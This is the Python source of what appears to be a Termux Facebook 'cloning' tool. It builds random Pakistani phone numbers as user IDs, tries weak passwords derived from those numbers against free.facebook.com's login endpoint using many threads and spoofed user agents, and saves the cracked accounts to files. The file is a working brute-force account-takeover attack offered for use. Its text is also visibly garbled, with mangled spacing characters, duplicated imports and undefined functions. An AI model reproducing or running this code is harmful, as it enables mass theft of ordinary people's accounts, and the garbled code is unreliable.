#---------------------[IMPORT]---------------------# 
 fromยbs4ยimportยBeautifulSoupยasยsop 
 fromยconcurrent.futuresยimportยThreadPoolExecutorยasยtred 
 importยos,sys,time,json,random,re,string,platform,base64,platform,uuid 
 importยrequests,random,sys,json,os,re 
 fromยtimeยimportยsleep 
 fromยosยimportยsystem 
 importยos,sys,time,datetime,random,hashlib,re,threading,json,urllib,uuid,ipaddress,calendar,requests,mechanize,bs4,sys,os,subprocess,uuid,requests,sys,random,time,re,base64,json,platform 
 fromยdatetimeยimportยdate 
 fromยdatetimeยimportยdatetime 
 fromยtimeยimportยsleep 
 fromยtimeยimportยsleepยasยwaktu 
 fromยrandomยimportยrandomยasยacak 
 fromยrandomยimportยchoiceยasยpilih 
 fromยrandomยimportยrandint 
 fromยbs4ยimportยBeautifulSoup 
 importยrequestsยasยress 
 fromยsysยimportยexitยasยexit 
 classยjalan: 
 ยยยยdefย__init__(self,ยz): 
 ยยยยยยยยforยeยinยzย+ย"\n": 
 ยยยยยยยยยยยยsys.stdout.write(e) 
 ยยยยยยยยยยยยsys.stdout.flush() 
 ยยยยยยยยยยยยtime.sleep(0.009) 
  
 ###----------[ยIMPORTยLIBRARYย]----------ย### 
 importยrequests 
 importยbs4 
 importยsys 
 importยos 
 importยrandom 
 importยtime 
 importยre 
 importยjson 
 importยuuid 
 importยsubprocess 
 importยmarshal 
 importยrich 
 importยshutil 
 importยwebbrowser 
 fromยrandomยimportยrandint 
 fromยconcurrent.futuresยimportยThreadPoolExecutorยasยThreadPool 
 fromยbs4ยimportยBeautifulSoupยasยpar 
 fromยdatetimeยimportยdate 
 fromยdatetimeยimportยdatetime 
 #ยfromยrichยimportยprintยasยprinter 
 fromยdatetimeยimportยdate 
 importยmarshal 
 try: 
 ยยยยimportยrequests 
 ยยยยfromยconcurrent.futuresยimportยThreadPoolExecutorยasยThreadPool 
 ยยยยimportยmechanize 
 ยยยยfromยrequests.exceptionsยimportยConnectionError 
 exceptยModuleNotFoundError: 
 ยยยยos.system('pipยinstallยmechanizeยrequestsยfutures==2ย>ย/dev/null') 
 ยยยยos.system('pythonย๐ฐ๐บ๐ฐ๐๐ท.py') 
 fromยbs4ยimportยBeautifulSoup 
 fromยdatetimeยimportยdate 
 fromยdatetimeยimportยdatetime 
 fromยtimeยimportยsleep 
 fromยtimeยimportยsleepยasยwaktu 
 ugenย=ย[] 
  
 Aย=ย'\x1b[1;97m'ย 
 Bย=ย'\x1b[1;96m'ย 
 Cย=ย'\x1b[1;91m'ย 
 Dย=ย'\x1b[1;92m' 
 Mย=ย'\033[1;31m' 
 Hย=ย'\033[1;32m' 
 Nย=ย'\x1b[1;37m'ยยยย 
 Eย=ย'\x1b[1;93m'ย 
 Fย=ย'\x1b[1;94m' 
 Gย=ย'\x1b[1;95m' 
 Pย=ย'\033[1;37m' 
 REDย=ย'\033[1;91m' 
 WHITEย=ย'\033[1;97m' 
 GREENย=ย'\033[1;32m'ย# 
 YELLOWย=ย'\033[1;33m' 
 BLUEย=ย'\033[1;34m' 
 ORANGEย=ย'\033[1;35m' 
 HBFย=ย'{ยHBFย}' 
 nowย=ยdatetime.now() 
 dt_stringย=ยnow.strftime("%H:%M") 
 currentย=ยdatetime.now() 
 taย=ยcurrent.year 
 buย=ยcurrent.month 
 haย=ยcurrent.day 
 todayย=ยdate.today() 
 ๐ฐ๐บ๐ฐ๐๐ท2ย=ย"\033[1;33mโค\033[1;32mโค\x1b[0m" 
 forยxdยinยrange(10000): 
 ยยยยx='Mozilla/5.0ย(Linux;ยU;ยAndroid' 
 ยยยยb=random.choice(['6','7','8','9','10','11','12']) 
 ยยยยc='ยen-us;ยGT-' 
 ยยยยd=random.choice(['A','B',ย'C',ย'D',ย'E',ย'F',ย'G',ย'H',ย'I',ย'J',ย'K',ย'L',ย'M',ย'N',ย'O',ย'P',ย'Q',ย'R',ย'S',ย'T',ย'U',ย'V',ย'W',ย'X',ย'Y',ย'Z']) 
 ยยยยe=random.randrange(1,ย999) 
 ยยยยf=random.choice(['A','B',ย'C',ย'D',ย'E',ย'F',ย'G',ย'H',ย'I',ย'J',ย'K',ย'L',ย'M',ย'N',ย'O',ย'P',ย'Q',ย'R',ย'S',ย'T',ย'U',ย'V',ย'W',ย'X',ย'Y',ย'Z']) 
 ยยยยg='AppleWebKit/537.36ย(KHTML,ยlikeยGecko)ยChrome/' 
 ยยยยh=random.randrange(73,100) 
 ยยยยi='0' 
 ยยยยj=random.randrange(4200,4900) 
 ยยยยk=random.randrange(40,150) 
 ยยยยl='MobileยSafari/537.36' 
 ยยยยuaku2=f'{x}ย{b};ย{c}{d}{e}{f})ย{g}{h}.{i}.{j}.{k}ย{l}' 
 ยยยยugen.append(uaku2) 
 try: 
 ยยยยos.system('curlยhttps://bacho1001.blogspot.com/2022/07/ua.htmlย-oยua.html') 
 except: 
 ยยยยpass 
 sock=open('ua.html','r').read().splitlines() 
 defยuaku2(): 
 ยยยยtry: 
 ยยยยยยยยua=open('bbnew.txt','r').read().splitlines() 
 ยยยยยยยยforยubยinยua: 
 ยยยยยยยยยยยยugen.append(ub) 
 ยยยยexcept: 
 ยยยยยยยยa=requests.get('https://bacho1001.blogspot.com/2022/07/ua.html').text 
 ยยยยยยยยua=open('.user-agents.txt','w') 
 ยยยยยยยยaa=re.findall('line">(.*?)<',str(a)) 
 ยยยยยยยยforยunยinยaa: 
 ยยยยยยยยยยยยua.write(un+'\n') 
 ยยยยยยยยua=open('.user-agents.txt','r').read().splitlines() 
  
 loopย=ย0 
 cpย=ย[] 
 okย=ย[] 
 twfย=ย[] 
  
 defยclear(): 
 ยยยยos.system('clear') 
 ยยยยprint(logo) 
 fromยtimeยimportยlocaltimeยasยlt 
 fromยosยimportยsystemยasยcmd 
 ltxย=ยint(lt()[3]) 
 ifยltxย>ย12: 
 ยยยยaย=ยltx-12 
 ยยยยtagย=ย"PM" 
 else: 
 ยยยยaย=ยltx 
 ยยยยtagย=ย"AM" 
  
 defยhelpnote(): 
 ยยยยยยยยprint("%sย[*]ยFOLLOWยMEยONยFbยTUยKNOWยABOUTยUPDATESยย:)"%(G)) 
 ยยยยยยยยsubprocess.check_output(["am",ย"start",ย"https://github.com/irfan7732/test/blob/main/a.txt"]) 
 ยยยยยยยยexit("ย[*]ยFACEBOOKย:ยยhttps://www.facebook.com/irfan.7732") 
  
  
 defยnotice(): 
  
 ย 
  
 ยยยยยยยยruntxt("\n\033[0;91mYOUยAREยNOTยPREMIUMยUSERย") 
 ยยยยยยยยruntxt("\033[0;93mยยSENTยTHISยKEYยTOยADMINย>>ย%s%s"%(G,basesplit)) 
 ยยยยยยยยruntxt("\033[0;92mยADMINยMESSENGER๐ฐRR-RIYAD") 
 ยยยยยยยยsubprocess.check_output(["am",ย"start",ย"https://m.me/abubockor.riad.7"]) 
  
 defยirfan(): 
 ยยยยยยยย 
 ยยยยยยยย 
 ยยยยยยยยruntxt("\n\033[0;91mยThisยtoolยisยUnderยmaintenanceยbreakย") 
 ยยยยยยยยruntxt("\n\033[0;91mยSoยwaitยForยUpdateย") 
  
 ยยยยยยยย 
 ยยยยยยยย 
 plistย=ย(platform.uname())[2] 
 basexย=ยplist 
 basex1ย=ยbasex.encode('ascii') 
 basex2ย=ยbase64.b64encode(basex1) 
 basex3ย=ยbasex2.decode('ascii') 
 base4ย=ย(basex3).upper() 
 basesplitย=ยbase4.replace('=',ย'X').replace('A',ย'3').replace('B',ย'9').replace('C',ย'7').replace('D',ย'1').replace('E',ย'4').replace('M',ย'2').replace('L',ย'6').replace('F',ย'8').replace('N',ย'E').replace('T',ย'8') 
  
  
 classยMain: 
 ยยยยยยยยdefย__init__(self): 
 ยยยยยยยยยยยยยยยยself.idย=ย[] 
 ยยยยยยยยยยยยยยยยself.okย=ย[] 
 ยยยยยยยยยยยยยยยยself.cpย=ย[] 
 ยยยยยยยยยยยยยยยยself.loopย=ย0 
 ยยยยยยยยยยยยยยยยtry: 
 ยยยยยยยยยยยยยยยยยยยยยยยยplrย=ยrequests.get('https://raw.githubusercontent.com/Riyad-RR-Hacker/text/main/Dis').text 
 ยยยยยยยยยยยยยยยยยยยยยยยยifยbasesplitยinยplr: 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยkeyย=ยbasesplit 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยstatย=ย("\033[0;92mPREMIUM") 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยFYย=ย'\033[0;93m' 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยFGย=ย'\033[0;92m' 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยGETย=ย'\r' 
 ยยยยยยยยยยยยยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยkeyย=ย("\033[0;91mย-") 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยstatย=ย("\033[0;91mFREEยUSER") 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยFYย=ย'\033[0;90m' 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยFGย=ย'\033[0;90m' 
 ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยGETย=ย'\033[0;92mย[P]ยGETยPREMIUM' 
 ยยยยยยยยยยยยยยยยexceptยrequests.exceptions.ConnectionError: 
 ยยยยยยยยยยยยยยยยยยยยยยยยprint("\n%sย[!]ยNOยINTERNETยCONNECTION..\n"%(G)) 
 ยยยยยยยยยยยยยยยยยยยยยยยยexit() 
 ยยยยยยยยยยยยยยยยos.system("clear") 
 ยยยยยยยยยยยยยยยย 
 ยยยยยยยยยยยยยยยยprintย("""\033[1;92mย_______ยยยย_____ย____ยย____ยยยย_ยยยยยย______ยยยย 
 |_ยยย__ย\ยย|_ยยย_|_ยย_||_ยย_|ยย/ย\ยยยย|_ยยย_ย`.ยย 
 ยย|ย|__)ย|ยยย|ย|ยยย\ย\ยย/ย/ยยย/ย_ย\ยยยยย|ย|ย`.ย\ย 
 ยย|ยย__ย/ยยยย|ย|ยยยย\ย\/ย/ยยย/ย___ย\ยยยย|ย|ยย|ย|ย 
 ย_|ย|ยย\ย\_ย_|ย|_ยยย_|ยย|_ย_/ย/ยยย\ย\_ย_|ย|_.'ย/ย 
 |____|ย|___|_____|ย|______|____|ย|____|______.'ยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยยย 
 \033[1;90mโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 
 \033[1;91mย[\033[1;94mโ\033[1;91m]ย\033[1;92mFACEBOOKย:ยAbubockorยRiyadยย 
 \033[1;91mย[\033[1;94mโ\033[1;91m]ย\033[1;92mFBยGROUPย:ยRRยTermuxยCommandย 
 \033[1;91mย[\033[1;94mโ\033[1;91m]ย\033[1;92mGITHUBยยย:ยRR-Hacker-Riyad 
 \033[1;91mย[\033[1;94mโ\033[1;91m]ย\033[1;92mWARNINGยย:ยFuckยMyยAllยHaters 
 \033[1;90mโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 
 ยยยย""") 
 ยยยยยยยย 
 defยchecks(ok,cp): 
 ยยยยifยnotยlen(ok)ย!=ย0: 
 ยยยยยยยยpass 
 ยยยยifยlen(cp)ย!=ย0: 
 ยยยยยยยยprint('\n\n\x1b[1;97mยTOTALยOKย:ย\x1b[1;97mย%sยย\x1b[1;97mHBF-OK.txt'ย%ย( 
 ยยยยยยยยยยยยH,ยP,ยstr(len(ok)))) 
 ยยยยยยยยprint('\x1b[1;97mยTOTALยCPย:\x1b[1;97mยยย%sย\x1b[1;97mHBF-CP.txt'ย% 
 ยยยยยยยยยยยยยย(H,ยP,ยstr(len(cp)))) 
 ยยยยยยยยinput("\x1b[1;97mPRESEยENTERยTOยBACKยMENUย") 
 ยยยยยยยยxyz() 
 #---------------------[LOOPยMENU]---------------------# 
 loopย=ย0 
 cpย=ย[] 
 okย=ย[] 
 twfย=ย[] 
  
  
 #---------------------[MAINยMENU]---------------------# 
  
 ยยยยprint(f'โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ') 
 ยยยยprint(f"ย{WHITE}TODAYยDATEย&ยTIMEยยยยย:{RED}ย{ha}/{bu}/{ta}ย{ORANGE}~>ย{GREEN}ย"+str(a)+":"+str(lt()[4])+"ย"+ยtag+"ย") 
 ยยยยprint(f"โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ") 
 ยยยยprint(f"[01]ย{WHITE}RANDOMยCLONEยPAKยยM1") 
 ยยยยprint(f"[02]ย{WHITE}RANDOMยCLONEยBDยยM1") 
 ยยยยprint(f"[03]ย{WHITE}OWNERยFBยID") 
 ยยยยprint(f"[04]ย{WHITE}OWNERยWHATSAPP") 
 ยยยยprint(f"[00]ย{WHITE}EXITยPROGRAMย") 
 ยยยยprint(f"") 
 ยยยยprint(f"\033[1;91m========================================================") 
 ยยยย๐ฐ๐บ๐ฐ๐๐ทย=ยinput("[โ]ยCHOOSEย:ย") 
 ยยยยifย๐ฐ๐บ๐ฐ๐๐ทยinย["1","01"]: 
 ยยยยยยยย 
 ยยยยยยยยpassword() 
 ยยยยelifย๐ฐ๐บ๐ฐ๐๐ทยinย["2","02"]: 
 ยยยยยยยยTabii2() 
 ยยยยยยยย 
 ยยยยelifย๐ฐ๐บ๐ฐ๐๐ทยinย["3","03"]: 
 ยยยยยยยยos.system("xdg-openยhttps://www.facebook.com/owner.termux");xyz() 
 ยยยยelifย๐ฐ๐บ๐ฐ๐๐ทยinย["4","04"]: 
 ยยยยยยยยos.system("xdg-openยhttps://wa.me/+8801721474011");xyz() 
 ยยยยelifย๐ฐ๐บ๐ฐ๐๐ทยinย["0","00"]: 
 ยยยยยยยexit() 
 ยยยยelse: 
 ยยยยยยยยprint('\033[1;31mINCORECTยOPTION!\033[1;31m') 
 ยยยยยยยยxyz() 
 #---------------------[PASSยDEF]---------------------# 
 defยpassword(): 
 ยยยย 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint('ยยยยยยย\x1b[97m[\033[37;41mยยPยAยSยSยWยOยRยDยยยMยEยNยUยยย\033[0;m]ย') 
 ยยยยprint(f"") 
 ยยยยprint(f"{RED}[01]ย{WHITE}ย1ยPASSWORDยยย{GREEN}ย[ยFASTESTโก]") 
 ยยยยprint(f"{RED}[02]ย{WHITE}ย2ยPASSWORDSยย{GREEN}ย[ยFASTยยยยย]") 
 ยยยยprint(f"{RED}[03]ย{WHITE}ย5ยPASSWORDSยย{GREEN}ย[ยSLOWยยย๐]") 
 ยยยยlinex() 
 ยยยยprint("") 
 ยยยยpassXย=ยinput(f"ย{RED}CHOOSE{๐ฐ๐บ๐ฐ๐๐ท2}ย:ย") 
 ยยยยifยpassXยinย['1','01']: 
 ยยยยยยยยos.system("xdg-openยhttps://www.facebook.com/owner.termux") 
 ยยยยยยยยpassword1() 
 ยยยยelifยpassXยinย['2','02']: 
 ยยยยยยยยos.system("xdg-openยhttps://www.facebook.com/owner.termux") 
 ยยยยยยยยpassword2() 
 ยยยยelifยpassXยinย['3','03']: 
 ยยยยยยยยos.system("xdg-openยhttps://www.facebook.com/owner.termux") 
 ยยยยยยยยpassword5() 
 ยยยยelse: 
 ยยยยยยยยxyz() 
 #---------------------[CLONINGยMAINยDEF]---------------------# 
 #---------------------[PASSย1ยCLONINGยMENU]---------------------# 
 defยpassword1(): 
 ยยยย 
 ยยยยuser=[] 
 ยยยยtwfย=[] 
 ยยยยos.getuid 
 ยยยยos.geteuid 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยclear() 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยCยOยDยEยยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"ยยยยยยยย\x1b[97m[\033[95;42mEXAMPLEย:๐\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยprint(f"ย0306ย,0300ย,0315ย,0333") 
 ยยยยprint(f"ย0341ย,0342ย,0345ย,0349") 
 ยยยยprint(f"ย0321ย,0316ย,0308ย,0309") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"\x1b[97m[\033[37;41mBESTยCODEย0300ย/ย0302ย/ย0306ย/ย0349ย/0315ยยย\033[0;m]") 
 ยยยยprint("") 
 ยยยยlinex() 
 ยยยยcodeย=ยinput('ยPUTยCODEย:ย') 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยLยIยMยIยTยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlimitย=ยint(input('ยEXAMPLE:ย2000,ย3000,ย50000,ย100000\n\nยPUTยCLONINGยLIMIT:ย')) 
 ยยยยforยnmbrยinยrange(limit): 
 ยยยยยยยยnmpย=ย''.join(random.choice(string.digits)ยforย_ยinยrange(7)) 
 ยยยยยยยยuser.append(nmp) 
 ยยยยwithยThreadPool(max_workers=30)ยasยmanshera:ยยยย 
 ยยยยยยยยclear() 
 ยยยยยยยยtlย=ยstr(len(user)) 
 ยยยยยยยยprint(f"ย{WHITE}TOTALยIDZยยยยยยยยยยยยย:ย{BLUE}"+tl+"ย~>ย[ยFASTESTโก]") 
 ยยยยยยยยprint(f"ย{WHITE}COUNTRYยYOUยCHOOSEยยยย:ย{GREEN}PAKISTANย๐ต๐ฐ") 
 ยยยยยยยยprint(f"ย{WHITE}NUMBERยYOUยPUTยยยยยยยย:ย{YELLOW}"+code) 
 ยยยยยยยยprint(f"ย{WHITE}TODAYยDATEย&ยTIMEยยยยย:{RED}ย{ha}/{bu}/{ta}ย{ORANGE}~>ย{GREEN}ย"+str(a)+":"+str(lt()[4])+"ย"+ยtag+"ย") 
 ยยยยยยยยprint(f"ย{WHITE}TOยSTOPยPROCESSยPRESSยCtrlย+ยZย") 
 ยยยยยยยยprint(f'{RED}==========================================================') 
 ยยยยยยยยforยloveยinยuser: 
 ยยยยยยยยยยยยuidย=ยcode+love 
 ยยยยยยยยยยยยpwxย=ย[love] 
 ยยยยยยยยยยยยmanshera.submit(free1,uid,pwx,tl) 
 defยfree1(uid,pwx,tl): 
 ยยยยglobalยloop 
 ยยยยglobalยok 
 ยยยยglobalยagents 
 ยยยยtry: 
 ยยยยยยยยforยpsยinยpwx: 
 ยยยยยยยยยยยยbiย=ยrandom.choice([A]) 
 ยยยยยยยยยยยยsessionย=ยrequests.Session() 
 ยยยยยยยยยยยยproย=ยrandom.choice(ugen) 
 ยยยยยยยยยยยยfree_fbย=ยsession.get('https://free.facebook.com').text 
 ยยยยยยยยยยยยlog_dataย=ย{ 
 ยยยยยยยยยยยยยยยย"lsd":re.search('name="lsd"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"jazoest":re.search('name="jazoest"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"m_ts":re.search('name="m_ts"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"li":re.search('name="li"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"try_number":"0", 
 ยยยยยยยยยยยย"unrecognized_tries":"0", 
 ยยยยยยยยยยยย"email":uid, 
 ยยยยยยยยยยยย"pass":ps, 
 ยยยยยยยยยยยย"login":"LogยIn"} 
 ยยยยยยยยยยยยheaderย=ย({"authority":ย'free.facebook.com', 
 ยยยยยยยยยยยย"method":ย'GET', 
 ยยยยยยยยยยย"scheme":ย'https', 
 ยยยยยยยยยยยย"accept":ย'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[insertedยbyยcythonยtoยavoidยcommentยcloser]/[insertedยbyยcythonยtoยavoidยcommentยstart]*;q=0.8,application/signed-exchange;v=b3;q=0.9', 
 ยยยยยยยยยยยย"accept-encoding":ย'gzip,ยdeflate,ยbr', 
 ยยยยยยยยยยยย"accept-language":ย'en-US,en;q=0.9', 
 ยยยยยยยยยยยย"cache-control":ย'no-cache', 
 ยยยยยยยยยยยย"pragma":ย'no-cache', 
 ยยยยยยยยยยยย"referer":ย'https://free.facebook.com/', 
 ยยยยยยยยยยยย"sec-ch-ua":ย'".Not/A)Brand";v="99",ย"GoogleยChrome";v="103",ย"Chromium";v="103"', 
 ยยยยยยยยยยยย"sec-ch-ua-mobile":ย'?0', 
 ยยยยยยยยยยยย"sec-ch-ua-platform":'"Windows"', 
 ยยยยยยยยยยยย"sec-fetch-dest":ย'manifest', 
 ยยยยยยยยยยยย"sec-fetch-mode":ย'cors', 
 ยยยยยยยยยยยย"sec-fetch-site":ย'same-origin', 
 ยยยยยยยยยยยย"user-agent":pro,}) 
 ยยยยยยยยยยยยloย=ยsession.post('https://free.facebook.com/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100&amp;refid=8',data=log_data,headers=header).text 
 ยยยยยยยยยยยยlog_cookies=session.cookies.get_dict().keys() 
 ยยยยยยยยยยยยifย'c_user'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยuidย=ยcoki[7:22] 
 ยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_OK.mp3") 
 ยยยยยยยยยยยยยยยยprint('\r\033[1;32m[๐ฐ๐บ๐ฐ๐๐ท-OK]ย'+uid+'ย[โ]ย'+ps+ย'') 
 ยยยยยยยยยยยยยยยยcek_apk(session,coki) 
 ยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-OK.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยok.append(uid) 
 ยยยยยยยยยยยยelifย'checkpoint'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยifย'Enterยloginยcodeยtoยcontinue'ยinยlog_cookies: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_2F.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint('\r\033[1;34m[๐ฐ๐บ๐ฐ๐๐ท-2F]ย'+uid+'ย[~]ย'+ps+'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-2F.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยtwf.append(uid) 
 ยยยยยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยยยยยcoki=";".join([key+"="+valueยforยkey,valueยinยsession.cookies.get_dict().items()]) 
 ยยยยยยยยยยยยยยยยยยยยuid=coki[24:39] 
 ยยยยยยยยยยยยยยยยยยยยRedย=ย'\033[1;31m' 
 ยยยยยยยยยยยยยยยยยยยยos.system("play-audioย๐ฐ๐บ๐ฐ๐๐ท_CP.mp3") 
 ยยยยยยยยยยยยยยยยยยยยprint(f'\r\033[1;30m[๐ฐ๐บ๐ฐ๐๐ท-CP]ย'+uid+'ย[ร]ย'+ps+ย'ย') 
 ยยยยยยยยยยยยยยยยยยยยopen('/sdcard/๐ฐ๐บ๐ฐ๐๐ท-CP.txt',ย'a').write(uid+'ย|ย'+ps+'\n') 
 ยยยยยยยยยยยยยยยยยยยยcp.append(uid) 
 ยยยยยยยยยยยยยยยยยยยยbreak 
 ยยยยยยยยยยยยelse: 
 ยยยยยยยยยยยยยยยยcontinue 
 ยยยยยยยยloop+=1 
 ยยยยยยยยsys.stdout.write(f'\r\33[1;37m[๐ฐ๐บ๐ฐ๐๐ทย๐ฅ]ย[%s]ย\33[1;97m[OK:%s{๐ฐ๐บ๐ฐ๐๐ท2}CP:%s]'%(loop,len(ok),len(cp))),ย 
 ยยยยยยยยsys.stdout.flush() 
 ยยยยยยยยchecks(ok,cp) 
 ยยยยexcept: 
 ยยยยยยยยpass 
  
  
  
  
  
  
 #---------------------[PASSย2ยCLONINGยMENU]---------------------# 
 defยpassword2(): 
 ยยยยuser=[] 
 ยยยย 
 ยยยยos.getuid 
 ยยยยos.geteuid 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยclear() 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยCยOยDยEยยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"ยยยยยยยย\x1b[97m[\033[95;42mEXAMPLEย:๐\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยprint(f"ย0306ย,0300ย,0315ย,0333") 
 ยยยยprint(f"ย0341ย,0342ย,0345ย,0349") 
 ยยยยprint(f"ย0321ย,0316ย,0308ย,0309") 
 ยยยยprint(f"") 
 ยยยยlinex() 
 ยยยยprint(f"\x1b[97m[\033[37;41mBESTยCODEย0300ย/ย0302ย/ย0306ย/ย0349ย/0315ยยย\033[0;m]") 
 ยยยยprint("") 
 ยยยยlinex() 
 ยยยยcodeย=ยinput('ยPUTยCODEย:ย') 
 ยยยยos.system("clear") 
 ยยยยprint(logo) 
 ยยยยprint(f"") 
 ยยยยprint(f"ยยยยยยยยยย\x1b[97m[\033[37;41mยยLยIยMยIยTยยยMยEยNยUยยย\033[0;m]") 
 ยยยยprint(f"") 
 ยยยยlimitย=ยint(input('ยEXAMPLE:ย2000,ย3000,ย50000,ย100000\n\nยPUTยCLONINGยLIMIT:ย')) 
 ยยยยforยnmbrยinยrange(limit): 
 ยยยยยยยยnmpย=ย''.join(random.choice(string.digits)ยforย_ยinยrange(7)) 
 ยยยยยยยยuser.append(nmp) 
 ยยยยwithยThreadPool(max_workers=30)ยasยmanshera:ยยยย 
 ยยยยยยยยclear() 
 ยยยยยยยยtlย=ยstr(len(user)) 
 ยยยยยยยยprint(f"ย{WHITE}TOTALยIDZยยยยยยยยยยยยย:ย{BLUE}"+tl+"ย~>ย[ยFASTย]") 
 ยยยยยยยยprint(f"ย{WHITE}COUNTRYยYOUยCHOOSEยยยย:ย{GREEN}PAKISTANย๐ต๐ฐ") 
 ยยยยยยยยprint(f"ย{WHITE}NUMBERยYOUยPUTยยยยยยยย:ย{YELLOW}"+code) 
 ยยยยยยยยprint(f"ย{WHITE}TODAYยDATEย&ยTIMEยยยยย:{RED}ย{ha}/{bu}/{ta}ย{ORANGE}~>ย{GREEN}ย"+str(a)+":"+str(lt()[4])+"ย"+ยtag+"ย") 
 ยยยยยยยยprint(f"ย{WHITE}TOยSTOPยPROCESSยPRESSยCtrlย+ยZย") 
 ยยยยยยยยprint(f'{RED}==========================================================') 
 ยยยยยยยยforยloveยinยuser: 
 ยยยยยยยยยยยยuidย=ยcode+love 
 ยยยยยยยยยยยยpwxย=ย[love,code+love] 
 ยยยยยยยยยยยยmanshera.submit(free2,uid,pwx,tl) 
 defยfree2(uid,pwx,tl): 
 ยยยยglobalยloop 
 ยยยยglobalยok 
 ยยยยglobalยagents 
 ยยยยtry: 
 ยยยยยยยยforยpsยinยpwx: 
 ยยยยยยยยยยยยbiย=ยrandom.choice([A]) 
 ยยยยยยยยยยยยsessionย=ยrequests.Session() 
 ยยยยยยยยยยยยproย=ยrandom.choice(ugen) 
 ยยยยยยยยยยยยfree_fbย=ยsession.get('https://free.facebook.com').text 
 ยยยยยยยยยยยยlog_dataย=ย{ 
 ยยยยยยยยยยยยยยยย"lsd":re.search('name="lsd"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"jazoest":re.search('name="jazoest"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"m_ts":re.search('name="m_ts"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"li":re.search('name="li"ยvalue="(.*?)"',ยstr(free_fb)).group(1), 
 ยยยยยยยยยยยย"try_number":"0", 
 ยยยยยยยยยยยย"unrecognized_tries":"0", 
 ยยยยยยยยยยยย"email":uid, 
 ยยยยยยยยยยยย"pass":ps, 
 ยยยยยยยยยยยย"login":"LogยIn"} 
 ยยยยยยยยยยยยheaderย=ย({"authority":ย'free.facebook.com', 
 ยยยยยยยยยยยย"method":ย'GET', 
 ยยยยยยยยยยย"scheme":ย'https', 
 ยยยยยยยยยยยย"accept":ย'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[insertedยbyยcythonยtoยavoidยcommentยcloser]/[insertedยbyยcythonยtoยavoidยcommentยstart]*;q=0.8,application/signed-exchange;v=b3;q=0.9', 
 ยยยยยยยยยยยย"accept-encoding":ย'gzip,ยdeflate,ยbr', 
 ยยยยยยยยยยยย"accept-language":ย'en-US,en;q=0.9', 
 ยยยยยยยยยยยย"cache-control":ย'no-cache', 
 ยยยยยยยยยยยย"pragma":ย'no-cache', 
 ยยยยยยยยยยยย"referer":ย'https://free.facebook.com/', 
 ยยยยยยยยยยยย"sec-ch-ua":ย'".Not/A)Brand";v="99",ย"GoogleยChrome";v="103",ย"Chromium";v="103"', 
 ยยยยยยยยยยยย"sec-ch-ua-mobile":ย'?0', 
 ยยยยยยยยยยยย"sec-ch-ua-platform":'"Windows"', 
